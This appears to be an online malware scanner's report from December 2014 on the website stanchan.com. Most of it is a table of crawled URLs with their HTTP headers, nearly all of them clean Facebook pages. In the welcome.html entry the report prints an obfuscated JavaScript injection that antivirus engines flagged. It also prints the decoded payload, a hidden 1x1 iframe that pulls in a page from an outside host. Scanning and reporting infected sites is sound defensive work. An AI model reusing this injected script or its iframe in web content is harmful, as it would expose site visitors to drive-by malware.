Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=stanchan.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://stanchan.com/ | HTTP/1.1 200 OK Date: Mon, 29 Dec 2014 04:02:25 GMT Accept-Ranges: bytes ETag: "16875b28217dcb1:d70dd" Server: Microsoft-IIS/6.0 Content-Length: 20538 Content-Location: http://stanchan.com/welcome.html Content-Type: text/html Last-Modified: Fri, 05 Nov 2010 19:39:27 GMT X-Powered-By: ASP.NET | clean |
http://stanchan.com/welcome.html | 200 OK Content-Length: 20538 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function nme(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(nme()>100000){function eEbKvNHSe(qEMQFOXnKc){ alert('nOBevVbxC');var nwTsnsgjfK = document.getElementById('olXPOWIOd'); }
function CnqEdre(QbWYjhIxns){var ikHGXJHQz=4,ysSci=9;var JzGUiHrCQy='55+5,75+5,74+2,79+5,72+0,77+3,73+7,43+1,81+7,75+5,73+3,80+4,75+1,56+0,50+6,43+1,75+1,73+7,75+5,74+6,75+1,80+4,56+0,50+6,43+1,7 var Thw=CnqEdre('mKSbCxBI')+LONDjbkYV('iCwpfifaFV')+BmdJaTdXK('JUAXjdlwH'); TVTQW=document;TVTQW['7275wr6969i3314t7510e85525604'.replace(/[0-9]/g,'')](Thw);function BAvErPO(lLunR){fff.op.replace("642");var UrEovWhM=new Function("FxzJX", "return 169057;"); } function eMOhoSkOC(HRD){fff.op.replace("266");var geXP = document.getElementById('IUPyxk');window.eval(); } } Decoded script: <iframe width=1 height=1 border=0 frameborder=0 src='http://sodanthu.com/in6.php'></iframe> Antivirus reports:
| ||
http://beemaentertainment.com/images2/S_News.php | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Dec 2014 04:02:27 GMT Location: https://www.facebook.com/BeemaRecordlabelimages2/S_News.php Server: Apache/2 Content-Length: 243 Content-Type: text/html; charset=iso-8859-1 | clean |
https://www.facebook.com/beemarecordlabelimages2/s_news.php | HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:27 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=U9KgVOafTts-Dx0u3Dc-Pih1; expires=Wed, 28-Dec-2016 04:02:27 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fbeemarecordlabelimages2%2Fs_news.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fbeemarecordlabelimages2%2Fs_news.php; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: jZXRDcIGA6T9MGC4kGW7L9VLcbCsMg+LCR+57zsdeJSlEPYs2D/VvlKZmGisTkNnr2NH8nSIZVUms/vecr0DrA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/beemarecordlabelimages2/s_news.php?_fb_noscript=1 | 404 Not Found Content-Length: 30588 Content-Type: text/html | clean |
https://fbstatic-a.akamaihd.net/rsrc.php/v2/yZ/r/fHFs_qAU4eg.js | 200 OK Content-Length: 109598 Content-Type: application/x-javascript | clean |
http://beemaentertainment.com/ | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Dec 2014 04:02:29 GMT Location: https://www.facebook.com/BeemaRecordlabel Server: Apache/2 Content-Length: 225 Content-Type: text/html; charset=iso-8859-1 | clean |
https://www.facebook.com/beemarecordlabel | HTTP/1.1 200 OK Connection: close Date: Mon, 29 Dec 2014 04:02:29 GMT Content-Length: 798 Content-Type: text/html;charset=utf-8 P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=VdKgVGvFub6VR5AGkleYnzQ-; expires=Wed, 28-Dec-2016 04:02:29 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fbeemarecordlabel; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fbeemarecordlabel; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: nHMww9WzZ4XiVgKQIEuLZKUUHmWhB7y9sQ5EHpmSm4m426e5bezw9CDT+AOnYeB+VP8apTB+hw979EuhwPsz2Q== X-UA-Compatible: IE=edge,chrome=1 | clean |
http://www.facebook.com/test404page.js | 404 Not Found Content-Length: 72 Content-Type: text/html | clean |
http://www.facebook.com/ | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Dec 2014 04:02:29 GMT Location: https://www.facebook.com/ Content-Length: 0 Content-Type: text/html; charset=utf-8 X-FB-Debug: ZzwOS4D41LD62KYMVkF3nLT1k+bN+qd7GB5yXEOv+YHjG5WLwwOmRQxsp0sA/4ugkAXewilk8jJzBQ+Qyujc6g== | clean |
https://www.facebook.com/ | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:30 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=VtKgVO4j0yWcorXebOVxUF0n; expires=Wed, 28-Dec-2016 04:02:30 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: O+J1F6pP++RVcSsTkpQACXXqxbWOmTz1YDyoR6r0hvfhDbMEFTpWB7o1GOHKSF43XNFwQKE7qSOUbR8Xn8CH/w== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/?_fb_noscript=1 | 200 OK Content-Length: 62610 Content-Type: text/html | clean |
https://www.facebook.com/recover/initiate | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:31 GMT Pragma: no-cache Content-Length: 817 Content-Type: text/html;charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=V9KgVK7T-a-ywgnEps3Js9Jm; expires=Wed, 28-Dec-2016 04:02:31 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: k8HBjzwmZHAB0XedtE0Y15fFduBEfJ6MSrHmrWVGF7j4Rjnx132f/1xB8f87SfqB8dqaIeU0LzCFARYdGr3BKg== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login/identify?ctx=recover | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:31 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=V9KgVMBLlobESAvWJzcLzJlG; expires=Wed, 28-Dec-2016 04:02:31 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: w7R8fNr6hJPIkOj8RYmF99R0+D6iQi60w8Bi30DtckiHrmXOA3hYwYqr4CIeN31w48avxLe11HH3veiexfIp7g== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login/identify?ctx=recover&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:32 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=WNKgVLgcP4zntxqRTwgVxHVn; expires=Wed, 28-Dec-2016 04:02:32 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: 5708AczmO8TavsSd21kv7dG73vtWsHsnaCq3wLk+1nW9Dg3e/H4gFFKmU2sjLD3lce/aDcRrlK313XF9nu+0SA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login/identify?ctx=recover&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:32 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=WNKgVJ63SgxTziGfVYLhclZa; expires=Wed, 28-Dec-2016 04:02:32 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: rCFnO/XxqJr1U8s1YEhC4nxuBPU8Nx31Pn65MJSJaYUlUTgvUAGpF+/nM+oTdAeTQ0aMNWEvXX7lyorb8txnuw== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login/identify?ctx=recover&%3bamp%3b_fb_noscript=1&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:32 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=WNKgVC10dj2_rOIFg8lue1Q8; expires=Wed, 28-Dec-2016 04:02:32 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: bJJc/WwMxNSAVGwx+nZBMlutpZDB8F7QqXFVudvkNld3TRAynW1/Hs0tQ7wh/lU3aDlZdkT7vpxxieqTJMNhsQ== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/login/identify?ctx=recover&%3bamp%3bamp%3b_fb_noscript=1&%3bamp%3b_fb_noscript=1&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:33 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=WdKgVMLwnhbV5O15Gk8ufZHT; expires=Wed, 28-Dec-2016 04:02:33 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin%2Fidentify%3Fctx%3Drecover%26amp%253Bamp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: QgItJSBNZ26M7PdNjduCKpDDRs741sPtsQePhYZ36wyUIXLwNFOfZwqUuIeoOvo9mLNv5mnqffPrWSmpHEMEqA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
http://www.facebook.com/legal/terms | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Dec 2014 04:02:33 GMT Location: https://www.facebook.com/legal/terms Content-Length: 0 Content-Type: text/html; charset=utf-8 P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=WdKgVDJgl33Mziltf2YZu66-; expires=Wed, 28-Dec-2016 04:02:33 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: 6hNR5saXXixzipj1eUDMEkZdM3Cx+DMKLnbarSUtfYYaMB+HymVPE49JFB/4shmk7F0UCekxq+vtKdr2oeoXVw== X-UA-Compatible: IE=edge,chrome=1 | clean |
https://www.facebook.com/legal/terms | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:33 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=WdKgVAlGKB9ooZ0khK3OWPY3; expires=Wed, 28-Dec-2016 04:02:33 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flegal%2Fterms; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flegal%2Fterms; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: IBrWLlCMIBRY6a39Kfxplt82OO4148AfjtwYtsa86v0Wtw05zGxbr/KZTm5v9Eoz2dSKiec7qsA9vTKlwCI+kg== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/legal/terms?_fb_noscript=1 | 200 OK Content-Length: 71111 Content-Type: text/html | clean |
https://www.facebook.com/r.php?locale=lt_LT | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:35 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=WtKgVOxUIiedJZn5YBvMqcYy; expires=Wed, 28-Dec-2016 04:02:34 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_LT; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: 42SO+9kS3OYF2vqpTsiY3kfNHOv8UIV8XDg2t9O83FCBLvsVQ8wSk/bWIZ3KR+6lMRx5Nrjz/Xez5aeO3jESWg== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/r.php?locale=lt_lt&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:35 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=W9KgVO6sELJnNWVM3nVFqKK8; expires=Wed, 28-Dec-2016 04:02:35 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_lt%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: LA0s1Hi7cNSSnAvjZv9aj6Hfo2r0zgZ/0T6c6WPZavQ4LWZWus+7V7Z4YIPjSONK3tUJiovoMaaDHmmNzbSiLg== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/r.php?locale=lt_lt&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:36 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=W9KgVGRK8LC7krYdX0JgDY1V; expires=Wed, 28-Dec-2016 04:02:35 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_lt%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: Njsd2oDUF7eFdgY7p+JdpgpTErmq3T9Hia3bW0w5KLEYCsw2+MtKyzMmQKXO526RgsbqmzkQIpJ/zwHUgCx1JQ== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/r.php?locale=lt_lt&%3bamp%3b_fb_noscript=1&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:36 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=XNKgVMz3bgolzP9_YXK-TZ4p; expires=Wed, 28-Dec-2016 04:02:36 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_lt%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: cyfCKzn2p9iwzmtLFcLZQDHSVd3nSnv3bsT6rcb64e9+FnKKVF9oE4dXotwEEs+E6mF7aYLheBGLX/mxdpJjSA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/r.php?locale=lt_lt&%3bamp%3bamp%3b_fb_noscript=1&%3bamp%3b_fb_noscript=1&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:37 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=XNKgVDb6FtyMtQa3MqUT_Qhf; expires=Wed, 28-Dec-2016 04:02:36 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_lt%26amp%253Bamp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: J951OL5eYQogB/SBVoNzc1MeqNSqHobx2GhhD+kShz+1jlkT5GHQ33JTP+/r1t0NPlUooqBe8nDbgyPV0PthBA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/r.php?locale=lt_lt&%3bamp%3bamp%3bamp%3b_fb_noscript=1&%3bamp%3bamp%3b_fb_noscript=1&%3bamp%3b_fb_noscript=1&%3b_fb_noscript=1&_fb_noscript=1 | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:37 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=XdKgVCNt6HCUuEVDeDFVaP7K; expires=Wed, 28-Dec-2016 04:02:37 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fr.php%3Flocale%3Dlt_lt%26amp%253Bamp%253Bamp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253Bamp%253B_fb_noscript%3D1%26amp%253Bamp%253B_fb_noscript%3D1%26amp%253B_fb_noscript%3D1; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: DdFatYLTBuOmiCbnYuDCDcFcwM8AQs4rRKnFEsMCMwLEPrM9lmqGt2Gxa4GVwOA6d/9k0ECrOFvTHrNqMEkBeQ== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
http://www.facebook.com/legal/ | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Dec 2014 04:02:37 GMT Location: https://www.facebook.com/legal/ Content-Length: 0 Content-Type: text/html; charset=utf-8 P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=XdKgVABQXNDT_-OOAI-Zan5n; expires=Wed, 28-Dec-2016 04:02:37 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: KbaJ8aU80gMnEwB1UZhp4Rwl3Eoal1uY8miQwLLcCD1XI5q5ui8kjrAj7sYAL9aO9AJWm9Ela+nLBPtaDW3dFA== X-UA-Compatible: IE=edge,chrome=1 | clean |
https://www.facebook.com/legal/ | HTTP/1.1 200 OK Connection: close Date: Mon, 29 Dec 2014 04:02:38 GMT Content-Length: 785 Content-Type: text/html;charset=utf-8 P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=XtKgVErRGk3CfbBUDxL9eR1R; expires=Wed, 28-Dec-2016 04:02:38 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly X-Content-Type-Options: nosniff X-FB-Debug: OEC2nCnniKxifXm5vmPOiw9uY+PfcQE+zqNnMU1Av7Ffdvze8HLY/zQT+Rm9qj58yqsbrTav4nGTX+B+fbXj7A== X-UA-Compatible: IE=edge,chrome=1 | clean |
https://www.facebook.com/legal/copyright.php | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:38 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=XtKgVEhyjGm6RZfLi0YHQEf4; expires=Wed, 28-Dec-2016 04:02:38 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flegal%2Fcopyright.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flegal%2Fcopyright.php; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: XUkgxyqrE/RzHvyTHTSv5ZuYi42lKcBou24q4+iNrQ4wxkUQt8AMnKzO5wCAHNxAUq8WoeA3Iq72S5kOk2X57w== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/legal/copyright.php?_fb_noscript=1 | 200 OK Content-Length: 41776 Content-Type: text/html | clean |
https://www.facebook.com/help/community/ | HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Connection: close Date: Mon, 29 Dec 2014 04:02:39 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Set-Cookie: datr=X9KgVLzwJyQ6k9TvWEuK3hZO; expires=Wed, 28-Dec-2016 04:02:39 GMT; Max-Age=63072000; path=/; domain=.facebook.com; httponly Set-Cookie: reg_ext_ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcommunity%2F; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcommunity%2F; path=/; domain=.facebook.com X-Content-Type-Options: nosniff X-FB-Debug: b9O4FSgyLEI6megZ8LmuUHUoEtL2XTUfYruBW39urrAAotdgp6rehgatoNg72tMKv2cz6Y3CkqxbcBmjb8hIzA== X-Frame-Options: DENY X-UA-Compatible: IE=edge,chrome=1 X-XSS-Protection: 0 | clean |
https://www.facebook.com/help/community/?_fb_noscript=1 | 200 OK Content-Length: 126753 Content-Type: text/html | clean |
